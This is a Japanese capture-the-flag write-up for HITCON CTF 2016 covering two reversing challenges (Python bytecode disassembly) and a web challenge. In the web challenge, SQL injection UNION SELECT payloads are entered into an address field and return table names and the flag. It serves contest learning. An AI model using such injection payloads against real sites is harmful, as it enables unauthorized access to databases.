この大会は2016/10/8 11:00(JST)~2016/10/10 11:00(JST)に開催されました。
今回もチームで参戦。結果は150点で1024チーム中226位でした。
自分で解けた問題をWriteupとして書いておきます。
Welcome (Reverse 50)
文字列を逆に読めばよい。
hitcon{Welcome to HITCON CTF}
Handcrafted pyc (Reverse 50)
pycのヘッダを付けてcrackme.pycを作成する。
#!/usr/bin/env python import marshal, zlib, base64 PYC_HEADER = '\x03\xf3\x0d\x0a\x14\x0c\xf4\x57' data = zlib.decompress(base64.b64decode('eJyNVktv00AQXm/eL0igiaFA01IO4cIVCUGFBBJwqRAckLhEIQmtRfPwI0QIeio/hRO/hJ/CiStH2M/prj07diGRP43Hs9+MZ2fWMxbnP6mux+oK9xVMHPFViLdCTB0xkeKDFEFfTIU4E8KZq8dCvB4UlN3hGEsdddXU9QTLv1eFiGKGM4cKUgsFCNLFH7dFrS9poayFYmIZm1b0gyqxMOwJaU3r6xs9sW1ooakXuRv+un7Q0sIlLVzOCZq/XtsK2oTSYaZlStogXi1HV0iazoN2CV2HZeXqRQ54TlJRb7FUlKyUatISsdzo+P7UU1Gb1POdMruckepGwk9tIXQTftz2yBaT5JQovWvpSa6poJPuqgao+b9l5Aj/R+mLQIP4f6Q8Vb3g/5TB/TJxWGdZr9EQrmn99fwKtTvAZGU7wzS7GNpZpDm2JgCrr8wrmPoo54UqGampFIeS9ojXjc4E2yI06bq/4DRoUAc0nVnng4k6p7Ks0+j/S8z9V+NZ5dhmrJUM/y7JTJeRtnJ2TSYJvsFq3CQt/vnfqmQXt5KlpuRcIvDAmhnn2E0t9BJ3SvB/SfLWhuOWNiNVZ+h28g4wlwUp00w95si43rZ3r6+fUIEdgOZbQAsyFRRvBR6dla8KCzRdslar7WS+a5HFb39peIAmG7uZTHVm17Czxju4m6bayz8e7J40DzqM0jr0bmv9PmPvk6y5z57HU8wdTDHeiUJvBMAM4+0CpoAZ4BPgJeAYEAHmgAUgAHiAj4AVAGORtwd4AVgC3gEmgBBwCPgMWANOAQ8AbwBHgHuAp4D3gLuARwoGmNUizF/j4yDC5BWM1kNvvlxFA8xikRrBxHIUhutFMBlgQoshhPphGAXe/OggKqqb2cibxwuEXjUcQjccxi5eFRL1fDSbKrUhy2CMb2aLyepkegDWsBwPlrVC0/kLHmeCBQ==')) data = PYC_HEADER + data with open('crackme.pyc', 'wb') as f: f.write(data)
Easy Python Decompilerでデコンパイルできない。uncompyle2も試したけど、結果は同じ。https://github.com/ershov/pycdumpのツールでディスアセンブルする。
>python pycdis.py crackme.pyc > crackme_asm.txt : 741 000342: 02E5: |71 F7 02| JUMP_ABSOLUTE 759 >> 744 000345: 02E8: |74 01 00| LOAD_GLOBAL 1 (raw_input) 747 000348: 02EB: |71 C8 05| JUMP_ABSOLUTE 1480 >> 750 00034B: 02EE: |7C 00 00| LOAD_FAST 0 (password) 753 00034E: 02F1: |6B 02 00| COMPARE_OP 2 (==) 756 000351: 02F4: |71 FF 02| JUMP_ABSOLUTE 767 >> 759 000354: 02F7: |02 | ROT_TWO 760 000355: 02F8: |7D 00 00| STORE_FAST 0 (password) 763 000358: 02FB: |01 | POP_TOP 764 000359: 02FC: |71 E8 02| JUMP_ABSOLUTE 744 >> 767 00035C: 02FF: |72 37 06| POP_JUMP_IF_FALSE 1591 770 00035F: 0302: |74 00 00| LOAD_GLOBAL 0 (chr) 773 000362: 0305: |64 11 00| LOAD_CONST 17 (99) 776 000365: 0308: |83 01 00| CALL_FUNCTION 1 779 000368: 030B: |74 00 00| LOAD_GLOBAL 0 (chr) 782 00036B: 030E: |64 0A 00| LOAD_CONST 10 (116) 785 00036E: 0311: |83 01 00| CALL_FUNCTION 1 788 000371: 0314: |74 00 00| LOAD_GLOBAL 0 (chr) 791 000374: 0317: |64 0E 00| LOAD_CONST 14 (105) 794 000377: 031A: |83 01 00| CALL_FUNCTION 1 797 00037A: 031D: |74 00 00| LOAD_GLOBAL 0 (chr) 800 00037D: 0320: |64 09 00| LOAD_CONST 9 (104) 803 000380: 0323: |83 01 00| CALL_FUNCTION 1 806 000383: 0326: |02 | ROT_TWO 807 000384: 0327: |17 | BINARY_ADD 808 000385: 0328: |02 | ROT_TWO 809 000386: 0329: |17 | BINARY_ADD 810 000387: 032A: |02 | ROT_TWO 811 000388: 032B: |17 | BINARY_ADD 812 000389: 032C: |74 00 00| LOAD_GLOBAL 0 (chr) 815 00038C: 032F: |64 18 00| LOAD_CONST 24 (78) 818 00038F: 0332: |83 01 00| CALL_FUNCTION 1 821 000392: 0335: |74 00 00| LOAD_GLOBAL 0 (chr) 824 000395: 0338: |64 19 00| LOAD_CONST 25 (123) 827 000398: 033B: |83 01 00| CALL_FUNCTION 1 830 00039B: 033E: |74 00 00| LOAD_GLOBAL 0 (chr) 833 00039E: 0341: |64 0B 00| LOAD_CONST 11 (110) 836 0003A1: 0344: |83 01 00| CALL_FUNCTION 1 839 0003A4: 0347: |74 00 00| LOAD_GLOBAL 0 (chr) 842 0003A7: 034A: |64 0C 00| LOAD_CONST 12 (111) 845 0003AA: 034D: |83 01 00| CALL_FUNCTION 1 848 0003AD: 0350: |02 | ROT_TWO 849 0003AE: 0351: |17 | BINARY_ADD 850 0003AF: 0352: |02 | ROT_TWO 851 0003B0: 0353: |17 | BINARY_ADD 852 0003B1: 0354: |02 | ROT_TWO 853 0003B2: 0355: |17 | BINARY_ADD 854 0003B3: 0356: |17 | BINARY_ADD 855 0003B4: 0357: |74 00 00| LOAD_GLOBAL 0 (chr) 858 0003B7: 035A: |64 07 00| LOAD_CONST 7 (121) 861 0003BA: 035D: |83 01 00| CALL_FUNCTION 1 864 0003BD: 0360: |74 00 00| LOAD_GLOBAL 0 (chr) 867 0003C0: 0363: |64 04 00| LOAD_CONST 4 (32) 870 0003C3: 0366: |83 01 00| CALL_FUNCTION 1 873 0003C6: 0369: |74 00 00| LOAD_GLOBAL 0 (chr) 876 0003C9: 036C: |64 1A 00| LOAD_CONST 26 (119) 879 0003CC: 036F: |83 01 00| CALL_FUNCTION 1 882 0003CF: 0372: |74 00 00| LOAD_GLOBAL 0 (chr) 885 0003D2: 0375: |64 0C 00| LOAD_CONST 12 (111) 888 0003D5: 0378: |83 01 00| CALL_FUNCTION 1 891 0003D8: 037B: |02 | ROT_TWO 892 0003D9: 037C: |17 | BINARY_ADD 893 0003DA: 037D: |02 | ROT_TWO 894 0003DB: 037E: |17 | BINARY_ADD 895 0003DC: 037F: |02 | ROT_TWO 896 0003DD: 0380: |17 | BINARY_ADD 897 0003DE: 0381: |74 00 00| LOAD_GLOBAL 0 (chr) 900 0003E1: 0384: |64 11 00| LOAD_CONST 17 (99) 903 0003E4: 0387: |83 01 00| CALL_FUNCTION 1 906 0003E7: 038A: |74 00 00| LOAD_GLOBAL 0 (chr) 909 0003EA: 038D: |64 04 00| LOAD_CONST 4 (32) 912 0003ED: 0390: |83 01 00| CALL_FUNCTION 1 915 0003F0: 0393: |74 00 00| LOAD_GLOBAL 0 (chr) 918 0003F3: 0396: |64 10 00| LOAD_CONST 16 (117) 921 0003F6: 0399: |83 01 00| CALL_FUNCTION 1 924 0003F9: 039C: |74 00 00| LOAD_GLOBAL 0 (chr) 927 0003FC: 039F: |64 0C 00| LOAD_CONST 12 (111) 930 0003FF: 03A2: |83 01 00| CALL_FUNCTION 1 933 000402: 03A5: |02 | ROT_TWO 934 000403: 03A6: |17 | BINARY_ADD 935 000404: 03A7: |02 | ROT_TWO 936 000405: 03A8: |17 | BINARY_ADD 937 000406: 03A9: |02 | ROT_TWO 938 000407: 03AA: |17 | BINARY_ADD 939 000408: 03AB: |17 | BINARY_ADD 940 000409: 03AC: |17 | BINARY_ADD 941 00040A: 03AD: |74 00 00| LOAD_GLOBAL 0 (chr) 944 00040D: 03B0: |64 11 00| LOAD_CONST 17 (99) 947 000410: 03B3: |83 01 00| CALL_FUNCTION 1 950 000413: 03B6: |74 00 00| LOAD_GLOBAL 0 (chr) 953 000416: 03B9: |64 04 00| LOAD_CONST 4 (32) 956 000419: 03BC: |83 01 00| CALL_FUNCTION 1 959 00041C: 03BF: |74 00 00| LOAD_GLOBAL 0 (chr) 962 00041F: 03C2: |64 0B 00| LOAD_CONST 11 (110) 965 000422: 03C5: |83 01 00| CALL_FUNCTION 1 968 000425: 03C8: |74 00 00| LOAD_GLOBAL 0 (chr) 971 000428: 03CB: |64 02 00| LOAD_CONST 2 (97) 974 00042B: 03CE: |83 01 00| CALL_FUNCTION 1 977 00042E: 03D1: |02 | ROT_TWO 978 00042F: 03D2: |17 | BINARY_ADD 979 000430: 03D3: |02 | ROT_TWO 980 000431: 03D4: |17 | BINARY_ADD 981 000432: 03D5: |02 | ROT_TWO 982 000433: 03D6: |17 | BINARY_ADD 983 000434: 03D7: |74 00 00| LOAD_GLOBAL 0 (chr) 986 000437: 03DA: |64 0E 00| LOAD_CONST 14 (105) 989 00043A: 03DD: |83 01 00| CALL_FUNCTION 1 992 00043D: 03E0: |74 00 00| LOAD_GLOBAL 0 (chr) 995 000440: 03E3: |64 14 00| LOAD_CONST 20 (112) 998 000443: 03E6: |83 01 00| CALL_FUNCTION 1 1001 000446: 03E9: |74 00 00| LOAD_GLOBAL 0 (chr) 1004 000449: 03EC: |64 06 00| LOAD_CONST 6 (109) 1007 00044C: 03EF: |83 01 00| CALL_FUNCTION 1 1010 00044F: 03F2: |74 00 00| LOAD_GLOBAL 0 (chr) 1013 000452: 03F5: |64 0C 00| LOAD_CONST 12 (111) 1016 000455: 03F8: |83 01 00| CALL_FUNCTION 1 1019 000458: 03FB: |02 | ROT_TWO 1020 000459: 03FC: |17 | BINARY_ADD 1021 00045A: 03FD: |02 | ROT_TWO 1022 00045B: 03FE: |17 | BINARY_ADD 1023 00045C: 03FF: |02 | ROT_TWO 1024 00045D: 0400: |17 | BINARY_ADD 1025 00045E: 0401: |17 | BINARY_ADD 1026 00045F: 0402: |74 00 00| LOAD_GLOBAL 0 (chr) 1029 000462: 0405: |64 02 00| LOAD_CONST 2 (97) 1032 000465: 0408: |83 01 00| CALL_FUNCTION 1 1035 000468: 040B: |74 00 00| LOAD_GLOBAL 0 (chr) 1038 00046B: 040E: |64 04 00| LOAD_CONST 4 (32) 1041 00046E: 0411: |83 01 00| CALL_FUNCTION 1 1044 000471: 0414: |74 00 00| LOAD_GLOBAL 0 (chr) 1047 000474: 0417: |64 05 00| LOAD_CONST 5 (101) 1050 000477: 041A: |83 01 00| CALL_FUNCTION 1 1053 00047A: 041D: |74 00 00| LOAD_GLOBAL 0 (chr) 1056 00047D: 0420: |64 01 00| LOAD_CONST 1 (108) 1059 000480: 0423: |83 01 00| CALL_FUNCTION 1 1062 000483: 0426: |02 | ROT_TWO 1063 000484: 0427: |17 | BINARY_ADD 1064 000485: 0428: |02 | ROT_TWO 1065 000486: 0429: |17 | BINARY_ADD 1066 000487: 042A: |02 | ROT_TWO 1067 000488: 042B: |17 | BINARY_ADD 1068 000489: 042C: |74 00 00| LOAD_GLOBAL 0 (chr) 1071 00048C: 042F: |64 16 00| LOAD_CONST 22 (100) 1074 00048F: 0432: |83 01 00| CALL_FUNCTION 1 1077 000492: 0435: |74 00 00| LOAD_GLOBAL 0 (chr) 1080 000495: 0438: |64 0B 00| LOAD_CONST 11 (110) 1083 000498: 043B: |83 01 00| CALL_FUNCTION 1 1086 00049B: 043E: |02 | ROT_TWO 1087 00049C: 043F: |17 | BINARY_ADD 1088 00049D: 0440: |74 00 00| LOAD_GLOBAL 0 (chr) 1091 0004A0: 0443: |64 10 00| LOAD_CONST 16 (117) 1094 0004A3: 0446: |83 01 00| CALL_FUNCTION 1 1097 0004A6: 0449: |74 00 00| LOAD_GLOBAL 0 (chr) 1100 0004A9: 044C: |64 0D 00| LOAD_CONST 13 (114) 1103 0004AC: 044F: |83 01 00| CALL_FUNCTION 1 1106 0004AF: 0452: |74 00 00| LOAD_GLOBAL 0 (chr) 1109 0004B2: 0455: |64 04 00| LOAD_CONST 4 (32) 1112 0004B5: 0458: |83 01 00| CALL_FUNCTION 1 1115 0004B8: 045B: |02 | ROT_TWO 1116 0004B9: 045C: |17 | BINARY_ADD 1117 0004BA: 045D: |02 | ROT_TWO 1118 0004BB: 045E: |17 | BINARY_ADD 1119 0004BC: 045F: |17 | BINARY_ADD 1120 0004BD: 0460: |17 | BINARY_ADD 1121 0004BE: 0461: |17 | BINARY_ADD 1122 0004BF: 0462: |17 | BINARY_ADD 1123 0004C0: 0463: |74 00 00| LOAD_GLOBAL 0 (chr) 1126 0004C3: 0466: |64 07 00| LOAD_CONST 7 (121) 1129 0004C6: 0469: |83 01 00| CALL_FUNCTION 1 1132 0004C9: 046C: |74 00 00| LOAD_GLOBAL 0 (chr) 1135 0004CC: 046F: |64 08 00| LOAD_CONST 8 (80) 1138 0004CF: 0472: |83 01 00| CALL_FUNCTION 1 1141 0004D2: 0475: |74 00 00| LOAD_GLOBAL 0 (chr) 1144 0004D5: 0478: |64 04 00| LOAD_CONST 4 (32) 1147 0004D8: 047B: |83 01 00| CALL_FUNCTION 1 1150 0004DB: 047E: |74 00 00| LOAD_GLOBAL 0 (chr) 1153 0004DE: 0481: |64 0B 00| LOAD_CONST 11 (110) 1156 0004E1: 0484: |83 01 00| CALL_FUNCTION 1 1159 0004E4: 0487: |02 | ROT_TWO 1160 0004E5: 0488: |17 | BINARY_ADD 1161 0004E6: 0489: |02 | ROT_TWO 1162 0004E7: 048A: |17 | BINARY_ADD 1163 0004E8: 048B: |02 | ROT_TWO 1164 0004E9: 048C: |17 | BINARY_ADD 1165 0004EA: 048D: |74 00 00| LOAD_GLOBAL 0 (chr) 1168 0004ED: 0490: |64 0B 00| LOAD_CONST 11 (110) 1171 0004F0: 0493: |83 01 00| CALL_FUNCTION 1 1174 0004F3: 0496: |74 00 00| LOAD_GLOBAL 0 (chr) 1177 0004F6: 0499: |64 0C 00| LOAD_CONST 12 (111) 1180 0004F9: 049C: |83 01 00| CALL_FUNCTION 1 1183 0004FC: 049F: |74 00 00| LOAD_GLOBAL 0 (chr) 1186 0004FF: 04A2: |64 09 00| LOAD_CONST 9 (104) 1189 000502: 04A5: |83 01 00| CALL_FUNCTION 1 1192 000505: 04A8: |74 00 00| LOAD_GLOBAL 0 (chr) 1195 000508: 04AB: |64 0A 00| LOAD_CONST 10 (116) 1198 00050B: 04AE: |83 01 00| CALL_FUNCTION 1 1201 00050E: 04B1: |02 | ROT_TWO 1202 00050F: 04B2: |17 | BINARY_ADD 1203 000510: 04B3: |02 | ROT_TWO 1204 000511: 04B4: |17 | BINARY_ADD 1205 000512: 04B5: |02 | ROT_TWO 1206 000513: 04B6: |17 | BINARY_ADD 1207 000514: 04B7: |17 | BINARY_ADD 1208 000515: 04B8: |74 00 00| LOAD_GLOBAL 0 (chr) 1211 000518: 04BB: |64 0A 00| LOAD_CONST 10 (116) 1214 00051B: 04BE: |83 01 00| CALL_FUNCTION 1 1217 00051E: 04C1: |74 00 00| LOAD_GLOBAL 0 (chr) 1220 000521: 04C4: |64 07 00| LOAD_CONST 7 (121) 1223 000524: 04C7: |83 01 00| CALL_FUNCTION 1 1226 000527: 04CA: |74 00 00| LOAD_GLOBAL 0 (chr) 1229 00052A: 04CD: |64 15 00| LOAD_CONST 21 (98) 1232 00052D: 04D0: |83 01 00| CALL_FUNCTION 1 1235 000530: 04D3: |74 00 00| LOAD_GLOBAL 0 (chr) 1238 000533: 04D6: |64 04 00| LOAD_CONST 4 (32) 1241 000536: 04D9: |83 01 00| CALL_FUNCTION 1 1244 000539: 04DC: |02 | ROT_TWO 1245 00053A: 04DD: |17 | BINARY_ADD 1246 00053B: 04DE: |02 | ROT_TWO 1247 00053C: 04DF: |17 | BINARY_ADD 1248 00053D: 04E0: |02 | ROT_TWO 1249 00053E: 04E1: |17 | BINARY_ADD 1250 00053F: 04E2: |74 00 00| LOAD_GLOBAL 0 (chr) 1253 000542: 04E5: |64 16 00| LOAD_CONST 22 (100) 1256 000545: 04E8: |83 01 00| CALL_FUNCTION 1 1259 000548: 04EB: |74 00 00| LOAD_GLOBAL 0 (chr) 1262 00054B: 04EE: |64 0C 00| LOAD_CONST 12 (111) 1265 00054E: 04F1: |83 01 00| CALL_FUNCTION 1 1268 000551: 04F4: |74 00 00| LOAD_GLOBAL 0 (chr) 1271 000554: 04F7: |64 11 00| LOAD_CONST 17 (99) 1274 000557: 04FA: |83 01 00| CALL_FUNCTION 1 1277 00055A: 04FD: |74 00 00| LOAD_GLOBAL 0 (chr) 1280 00055D: 0500: |64 05 00| LOAD_CONST 5 (101) 1283 000560: 0503: |83 01 00| CALL_FUNCTION 1 1286 000563: 0506: |02 | ROT_TWO 1287 000564: 0507: |17 | BINARY_ADD 1288 000565: 0508: |02 | ROT_TWO 1289 000566: 0509: |17 | BINARY_ADD 1290 000567: 050A: |02 | ROT_TWO 1291 000568: 050B: |17 | BINARY_ADD 1292 000569: 050C: |17 | BINARY_ADD 1293 00056A: 050D: |17 | BINARY_ADD 1294 00056B: 050E: |74 00 00| LOAD_GLOBAL 0 (chr) 1297 00056E: 0511: |64 0B 00| LOAD_CONST 11 (110) 1300 000571: 0514: |83 01 00| CALL_FUNCTION 1 1303 000574: 0517: |74 00 00| LOAD_GLOBAL 0 (chr) 1306 000577: 051A: |64 0E 00| LOAD_CONST 14 (105) 1309 00057A: 051D: |83 01 00| CALL_FUNCTION 1 1312 00057D: 0520: |74 00 00| LOAD_GLOBAL 0 (chr) 1315 000580: 0523: |64 04 00| LOAD_CONST 4 (32) 1318 000583: 0526: |83 01 00| CALL_FUNCTION 1 1321 000586: 0529: |74 00 00| LOAD_GLOBAL 0 (chr) 1324 000589: 052C: |64 05 00| LOAD_CONST 5 (101) 1327 00058C: 052F: |83 01 00| CALL_FUNCTION 1 1330 00058F: 0532: |02 | ROT_TWO 1331 000590: 0533: |17 | BINARY_ADD 1332 000591: 0534: |02 | ROT_TWO 1333 000592: 0535: |17 | BINARY_ADD 1334 000593: 0536: |02 | ROT_TWO 1335 000594: 0537: |17 | BINARY_ADD 1336 000595: 0538: |74 00 00| LOAD_GLOBAL 0 (chr) 1339 000598: 053B: |64 10 00| LOAD_CONST 16 (117) 1342 00059B: 053E: |83 01 00| CALL_FUNCTION 1 1345 00059E: 0541: |74 00 00| LOAD_GLOBAL 0 (chr) 1348 0005A1: 0544: |64 0C 00| LOAD_CONST 12 (111) 1351 0005A4: 0547: |83 01 00| CALL_FUNCTION 1 1354 0005A7: 054A: |74 00 00| LOAD_GLOBAL 0 (chr) 1357 0005AA: 054D: |64 07 00| LOAD_CONST 7 (121) 1360 0005AD: 0550: |83 01 00| CALL_FUNCTION 1 1363 0005B0: 0553: |74 00 00| LOAD_GLOBAL 0 (chr) 1366 0005B3: 0556: |64 04 00| LOAD_CONST 4 (32) 1369 0005B6: 0559: |83 01 00| CALL_FUNCTION 1 1372 0005B9: 055C: |02 | ROT_TWO 1373 0005BA: 055D: |17 | BINARY_ADD 1374 0005BB: 055E: |02 | ROT_TWO 1375 0005BC: 055F: |17 | BINARY_ADD 1376 0005BD: 0560: |02 | ROT_TWO 1377 0005BE: 0561: |17 | BINARY_ADD 1378 0005BF: 0562: |17 | BINARY_ADD 1379 0005C0: 0563: |74 00 00| LOAD_GLOBAL 0 (chr) 1382 0005C3: 0566: |64 0D 00| LOAD_CONST 13 (114) 1385 0005C6: 0569: |83 01 00| CALL_FUNCTION 1 1388 0005C9: 056C: |74 00 00| LOAD_GLOBAL 0 (chr) 1391 0005CC: 056F: |64 15 00| LOAD_CONST 21 (98) 1394 0005CF: 0572: |83 01 00| CALL_FUNCTION 1 1397 0005D2: 0575: |74 00 00| LOAD_GLOBAL 0 (chr) 1400 0005D5: 0578: |64 04 00| LOAD_CONST 4 (32) 1403 0005D8: 057B: |83 01 00| CALL_FUNCTION 1 1406 0005DB: 057E: |74 00 00| LOAD_GLOBAL 0 (chr) 1409 0005DE: 0581: |64 0D 00| LOAD_CONST 13 (114) 1412 0005E1: 0584: |83 01 00| CALL_FUNCTION 1 1415 0005E4: 0587: |02 | ROT_TWO 1416 0005E5: 0588: |17 | BINARY_ADD 1417 0005E6: 0589: |02 | ROT_TWO 1418 0005E7: 058A: |17 | BINARY_ADD 1419 0005E8: 058B: |02 | ROT_TWO 1420 0005E9: 058C: |17 | BINARY_ADD 1421 0005EA: 058D: |74 00 00| LOAD_GLOBAL 0 (chr) 1424 0005ED: 0590: |64 0E 00| LOAD_CONST 14 (105) 1427 0005F0: 0593: |83 01 00| CALL_FUNCTION 1 1430 0005F3: 0596: |74 00 00| LOAD_GLOBAL 0 (chr) 1433 0005F6: 0599: |64 02 00| LOAD_CONST 2 (97) 1436 0005F9: 059C: |83 01 00| CALL_FUNCTION 1 1439 0005FC: 059F: |02 | ROT_TWO 1440 0005FD: 05A0: |17 | BINARY_ADD 1441 0005FE: 05A1: |74 00 00| LOAD_GLOBAL 0 (chr) 1444 000601: 05A4: |64 1B 00| LOAD_CONST 27 (125) 1447 000604: 05A7: |83 01 00| CALL_FUNCTION 1 1450 000607: 05AA: |74 00 00| LOAD_GLOBAL 0 (chr) 1453 00060A: 05AD: |64 12 00| LOAD_CONST 18 (33) 1456 00060D: 05B0: |83 01 00| CALL_FUNCTION 1 1459 000610: 05B3: |74 00 00| LOAD_GLOBAL 0 (chr) 1462 000613: 05B6: |64 0B 00| LOAD_CONST 11 (110) 1465 000616: 05B9: |83 01 00| CALL_FUNCTION 1 1468 000619: 05BC: |02 | ROT_TWO 1469 00061A: 05BD: |17 | BINARY_ADD 1470 00061B: 05BE: |02 | ROT_TWO 1471 00061C: 05BF: |17 | BINARY_ADD 1472 00061D: 05C0: |17 | BINARY_ADD 1473 00061E: 05C1: |17 | BINARY_ADD 1474 00061F: 05C2: |17 | BINARY_ADD 1475 000620: 05C3: |17 | BINARY_ADD 1476 000621: 05C4: |17 | BINARY_ADD :
パスワード入力付近に比較部分があり、ASCIIコードが並んでいる。
以下、それぞれ塊ごとに逆順で読み込めば、フラグになりそう。
99 116 105 104 78 123 110 111 121 32 119 111 99 32 117 111 99 32 110 97 105 112 109 111 97 32 101 108 100 110 117 114 32 121 80 32 110 110 111 104 116 116 121 98 32 100 111 99 101 110 105 32 101 117 111 121 32 114 98 32 114 105 97 125 33 110
上記をcodes.txtに保存して、以下のコードを実行する。
with open('codes.txt', 'r') as f: lines = f.readlines() flag = '' for line in lines: codes = line.strip('\n').split(' ') s = '' for code in codes: s += chr(int(code)) flag += s[::-1] print flag
hitcon{Now you can compile and run Python bytecode in your brain!}
Are you rich? (Web 50)
SQLインジェクションが可能。
Address欄にlimitで何番目の情報を得るか調整しながら、情報を得る。
Address: 18Tx7MqRaUfkejuZT2h4DstD6CjemxvZ9E' union select table_name from INFORMATION_SCHEMA.TABLES limit 62,1 # ↓ Error!: Remote API server reject your invalid address 'flag1'. If your address is valid, please PM @cebrusfs or other admin on IRC. Address: 18Tx7MqRaUfkejuZT2h4DstD6CjemxvZ9E' union select flag from flag1 limit 1,1 # ↓ Error!: Remote API server reject your invalid address 'hitcon{4r3_y0u_r1ch?ju57_buy_7h3_fl4g!!}'. If your address is valid, please PM @cebrusfs or other admin on IRC.
hitcon{4r3_y0u_r1ch?ju57_buy_7h3_fl4g!!}